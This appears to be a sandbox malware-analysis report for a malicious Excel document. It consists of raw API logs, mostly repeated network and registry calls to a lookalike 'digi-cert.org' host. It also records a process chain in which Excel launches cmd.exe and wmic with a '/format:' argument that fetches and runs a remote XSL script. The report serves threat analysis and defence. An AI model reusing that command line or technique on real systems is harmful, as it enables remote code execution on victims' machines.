Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = digi-cert.org, address_out = 162.243.19.12	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data

Process #8: cmd.exe

Information	Value
ID	#8
File Name	c:\windows\system32\cmd.exe
Command Line	CMD.EXE /C wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"
Initial Working Directory	C:\Users\Nd9E1FYi\Desktop\
Monitor	Start Time: 00:01:50, Reason: Child Process
Unmonitor	End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration	00:08:50

OS Process Information

Information	Value
PID	0xcd4
Parent PID	0xed8 (c:\program files\microsoft office\office16\excel.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	X2VS1CUM\Nd9E1FYi
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x CE8 0x BD4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	-
private_0x000000183c600000	0x183c600000	0x183c7fffff	Private Memory	Readable, Writable	-
private_0x000000183c800000	0x183c800000	0x183c8fffff	Private Memory	Readable, Writable	-
private_0x000000183c900000	0x183c900000	0x183c9fffff	Private Memory	Readable, Writable	-
private_0x0000018a09850000	0x18a09850000	0x18a0986ffff	Private Memory	Readable, Writable	-
pagefile_0x0000018a09850000	0x18a09850000	0x18a0985ffff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000018a09860000	0x18a09860000	0x18a09866fff	Private Memory	Readable, Writable	-
pagefile_0x0000018a09870000	0x18a09870000	0x18a09884fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000018a09890000	0x18a09890000	0x18a09893fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000018a098a0000	0x18a098a0000	0x18a098a0fff	Pagefile Backed Memory	Readable	-
private_0x0000018a098b0000	0x18a098b0000	0x18a098b1fff	Private Memory	Readable, Writable	-
locale.nls	0x18a098c0000	0x18a0997dfff	Memory Mapped File	Readable	-
private_0x0000018a09980000	0x18a09980000	0x18a09a7ffff	Private Memory	Readable, Writable	-
private_0x0000018a09a80000	0x18a09a80000	0x18a09a86fff	Private Memory	Readable, Writable	-
private_0x0000018a09bf0000	0x18a09bf0000	0x18a09bfffff	Private Memory	Readable, Writable	-
sortdefault.nls	0x18a09c00000	0x18a09f36fff	Memory Mapped File	Readable	-
pagefile_0x00007df5ff480000	0x7df5ff480000	0x7ff5ff47ffff	Pagefile Backed Memory	-	-
pagefile_0x00007ff648010000	0x7ff648010000	0x7ff64810ffff	Pagefile Backed Memory	Readable	-
pagefile_0x00007ff648110000	0x7ff648110000	0x7ff648132fff	Pagefile Backed Memory	Readable	-
cmd.exe	0x7ff649110000	0x7ff649169fff	Memory Mapped File	Readable, Writable, Executable	-
kernelbase.dll	0x7ffc14550000	0x7ffc14737fff	Memory Mapped File	Readable, Writable, Executable	-
msvcrt.dll	0x7ffc164b0000	0x7ffc1654cfff	Memory Mapped File	Readable, Writable, Executable	-
kernel32.dll	0x7ffc17120000	0x7ffc171ccfff	Memory Mapped File	Readable, Writable, Executable	-
ntdll.dll	0x7ffc17400000	0x7ffc175c0fff	Memory Mapped File	Readable, Writable, Executable	-

Threads

Thread 0xce8

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x7ff649110000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc17120000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffc17143270	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\SYSTEM32\CMD.EXE, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\Nd9E1FYi\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc17120000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7ffc17148940	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7ffc17147460	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7ffc145a6e50	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\Wbem\WMIC.exe, os_pid = 0x434, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #10: wmic.exe

891

602

Information	Value
ID	#10
File Name	c:\windows\system32\wbem\wmic.exe
Command Line	wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"
Initial Working Directory	C:\Users\Nd9E1FYi\Desktop\
Monitor	Start Time: 00:01:50, Reason: Child Process
Unmonitor	End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration	00:08:50

OS Process Information

Information	Value
PID	0x434
Parent PID	0xcd4 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	X2VS1CUM\Nd9E1FYi
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 6BC 0x 740 0x B84 0x BC8 0x 47C 0x A7C 0x B40 0x EBC 0x 888 0x 480 0x 454 0x BD0 0x 90C 0x 2FC

Region

Name	Start VA	End VA	Type	Permissions	Actions
msvcr80.dll	0x5cfe0000	0x5d0a8fff	Memory Mapped File	Readable, Writable, Executable	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	-
private_0x000000d7edd10000	0xd7edd10000	0xd7edd8ffff	Private Memory	Readable, Writable	-
private_0x000000d7ede00000	0xd7ede00000	0xd7edffffff	Private Memory	Readable, Writable	-
private_0x000000d7ee000000	0xd7ee000000	0xd7ee07ffff	Private Memory	Readable, Writable	-
private_0x000000d7ee080000	0xd7ee080000	0xd7ee0fffff	Private Memory	Readable, Writable	-
private_0x000000d7ee100000	0xd7ee100000	0xd7ee17ffff	Private Memory	Readable, Writable	-
private_0x000000d7ee180000	0xd7ee180000	0xd7ee1fffff	Private Memory	Readable, Writable	-
private_0x000000d7ee200000	0xd7ee200000	0xd7ee27ffff	Private Memory	Readable, Writable	-
private_0x000000d7ee280000	0xd7ee280000	0xd7ee2fffff	Private Memory	Readable, Writable	-
private_0x000002ad20490000	0x2ad20490000	0x2ad204affff	Private Memory	Readable, Writable	-
pagefile_0x000002ad20490000	0x2ad20490000	0x2ad2049ffff	Pagefile Backed Memory	Readable, Writable	-
private_0x000002ad204a0000	0x2ad204a0000	0x2ad204a6fff	Private Memory	Readable, Writable	-
pagefile_0x000002ad204b0000	0x2ad204b0000	0x2ad204c4fff	Pagefile Backed Memory	Readable	-
pagefile_0x000002ad204d0000	0x2ad204d0000	0x2ad204d3fff	Pagefile Backed Memory	Readable	-
pagefile_0x000002ad204e0000	0x2ad204e0000	0x2ad204e0fff	Pagefile Backed Memory	Readable	-
private_0x000002ad204f0000	0x2ad204f0000	0x2ad204f1fff	Private Memory	Readable, Writable	-
locale.nls	0x2ad20500000	0x2ad205bdfff	Memory Mapped File	Readable	-
private_0x000002ad205c0000	0x2ad205c0000	0x2ad205c6fff	Private Memory	Readable, Writable	-
private_0x000002ad205d0000	0x2ad205d0000	0x2ad206cffff	Private Memory	Readable, Writable	-
rpcss.dll	0x2ad206d0000	0x2ad207acfff	Memory Mapped File	Readable	-
pagefile_0x000002ad206d0000	0x2ad206d0000	0x2ad206d0fff	Pagefile Backed Memory	Readable	-
pagefile_0x000002ad206e0000	0x2ad206e0000	0x2ad206e0fff	Pagefile Backed Memory	Readable	-
ole32.dll	0x2ad206f0000	0x2ad20832fff	Memory Mapped File	Readable	-
private_0x000002ad206f0000	0x2ad206f0000	0x2ad207bffff	Private Memory	Readable, Writable	-
private_0x000002ad206f0000	0x2ad206f0000	0x2ad2073ffff	Private Memory	Readable, Writable	-
pagefile_0x000002ad206f0000	0x2ad206f0000	0x2ad206f1fff	Pagefile Backed Memory	Readable	-
pagefile_0x000002ad20700000	0x2ad20700000	0x2ad20700fff	Pagefile Backed Memory	Readable, Writable	-
msxml3r.dll	0x2ad20710000	0x2ad20710fff	Memory Mapped File	Readable	-
wmic.exe.mui	0x2ad20720000	0x2ad2072ffff	Memory Mapped File	Readable	-
private_0x000002ad20730000	0x2ad20730000	0x2ad2073ffff	Private Memory	Readable, Writable	-
private_0x000002ad20740000	0x2ad20740000	0x2ad2079ffff	Private Memory	Readable, Writable	-
private_0x000002ad20740000	0x2ad20740000	0x2ad2075ffff	Private Memory	-	-
private_0x000002ad20760000	0x2ad20760000	0x2ad20760fff	Private Memory	Readable, Writable	-
private_0x000002ad20770000	0x2ad20770000	0x2ad20770fff	Private Memory	Readable, Writable	-
pagefile_0x000002ad20780000	0x2ad20780000	0x2ad20780fff	Pagefile Backed Memory	Readable	-
pagefile_0x000002ad20780000	0x2ad20780000	0x2ad20783fff	Pagefile Backed Memory	Readable	-
private_0x000002ad20790000	0x2ad20790000	0x2ad2079ffff	Private Memory	Readable, Writable	-
private_0x000002ad207a0000	0x2ad207a0000	0x2ad207a0fff	Private Memory	Readable, Writable	-
private_0x000002ad207b0000	0x2ad207b0000	0x2ad207bffff	Private Memory	Readable, Writable	-
private_0x000002ad207c0000	0x2ad207c0000	0x2ad2084ffff	Private Memory	Readable, Writable	-
private_0x000002ad207c0000	0x2ad207c0000	0x2ad2083ffff	Private Memory	Readable, Writable	-
imm32.dll	0x2ad207c0000	0x2ad207f8fff	Memory Mapped File	Readable	-
private_0x000002ad207c0000	0x2ad207c0000	0x2ad207effff	Private Memory	Readable, Writable	-
private_0x000002ad207c0000	0x2ad207c0000	0x2ad207c0fff	Private Memory	Readable, Writable	-
pagefile_0x000002ad207d0000	0x2ad207d0000	0x2ad207d0fff	Pagefile Backed Memory	Readable, Writable	-
private_0x000002ad207e0000	0x2ad207e0000	0x2ad207effff	Private Memory	Readable, Writable	-
pagefile_0x000002ad207f0000	0x2ad207f0000	0x2ad2080ffff	Pagefile Backed Memory	Readable, Writable	-
counters.dat	0x2ad207f0000	0x2ad207f0fff	Memory Mapped File	Readable, Writable	-
pagefile_0x000002ad20800000	0x2ad20800000	0x2ad20800fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x000002ad20810000	0x2ad20810000	0x2ad2081ffff	Pagefile Backed Memory	Readable	-
private_0x000002ad20820000	0x2ad20820000	0x2ad20821fff	Private Memory	Readable, Writable	-
private_0x000002ad20820000	0x2ad20820000	0x2ad20826fff	Private Memory	Readable, Writable	-
private_0x000002ad20830000	0x2ad20830000	0x2ad2083ffff	Private Memory	Readable, Writable	-
private_0x000002ad20840000	0x2ad20840000	0x2ad2084ffff	Private Memory	Readable, Writable	-
pagefile_0x000002ad20850000	0x2ad20850000	0x2ad20850fff	Pagefile Backed Memory	Readable	-
private_0x000002ad20870000	0x2ad20870000	0x2ad2087ffff	Private Memory	Readable, Writable	-
sortdefault.nls	0x2ad20880000	0x2ad20bb6fff	Memory Mapped File	Readable	-
private_0x000002ad20bc0000	0x2ad20bc0000	0x2ad20d7ffff	Private Memory	Readable, Writable	-
private_0x000002ad20bc0000	0x2ad20bc0000	0x2ad20cdffff	Private Memory	Readable, Writable	-
kernelbase.dll.mui	0x2ad20bc0000	0x2ad20c9ffff	Memory Mapped File	Readable	-
private_0x000002ad20cd0000	0x2ad20cd0000	0x2ad20cdffff	Private Memory	Readable, Writable	-
private_0x000002ad20d70000	0x2ad20d70000	0x2ad20d7ffff	Private Memory	Readable, Writable	-
private_0x000002ad20d80000	0x2ad20d80000	0x2ad2117ffff	Private Memory	Readable, Writable	-
pagefile_0x000002ad21180000	0x2ad21180000	0x2ad21307fff	Pagefile Backed Memory	Readable	-
pagefile_0x000002ad21310000	0x2ad21310000	0x2ad21490fff	Pagefile Backed Memory	Readable	-
pagefile_0x000002ad214a0000	0x2ad214a0000	0x2ad2289ffff	Pagefile Backed Memory	Readable	-
pagefile_0x000002ad228a0000	0x2ad228a0000	0x2ad2295bfff	Pagefile Backed Memory	Readable	-
rpcss.dll	0x2ad22960000	0x2ad22a3cfff	Memory Mapped File	Readable	-
private_0x000002ad22960000	0x2ad22960000	0x2ad22a5ffff	Private Memory	Readable, Writable	-
private_0x000002ad22a60000	0x2ad22a60000	0x2ad22b5ffff	Private Memory	Readable, Writable	-
private_0x000002ad22b60000	0x2ad22b60000	0x2ad22c5ffff	Private Memory	Readable, Writable	-
private_0x000002ad22c60000	0x2ad22c60000	0x2ad22d5ffff	Private Memory	Readable, Writable	-
pagefile_0x000002ad22d60000	0x2ad22d60000	0x2ad2315afff	Pagefile Backed Memory	Readable	-
private_0x000002ad23230000	0x2ad23230000	0x2ad2323ffff	Private Memory	Readable, Writable, Executable	-
private_0x000002ad23250000	0x2ad23250000	0x2ad2325ffff	Private Memory	Readable, Writable	-
pagefile_0x00007df5ffb60000	0x7df5ffb60000	0x7ff5ffb5ffff	Pagefile Backed Memory	-	-
pagefile_0x00007ff66e290000	0x7ff66e290000	0x7ff66e38ffff	Pagefile Backed Memory	Readable	-
pagefile_0x00007ff66e390000	0x7ff66e390000	0x7ff66e3b2fff	Pagefile Backed Memory	Readable	-
wmic.exe	0x7ff66e670000	0x7ff66e6f1fff	Memory Mapped File	Readable, Writable, Executable	-
jscript.dll	0x7ffbf6140000	0x7ffbf6207fff	Memory Mapped File	Readable, Writable, Executable	-
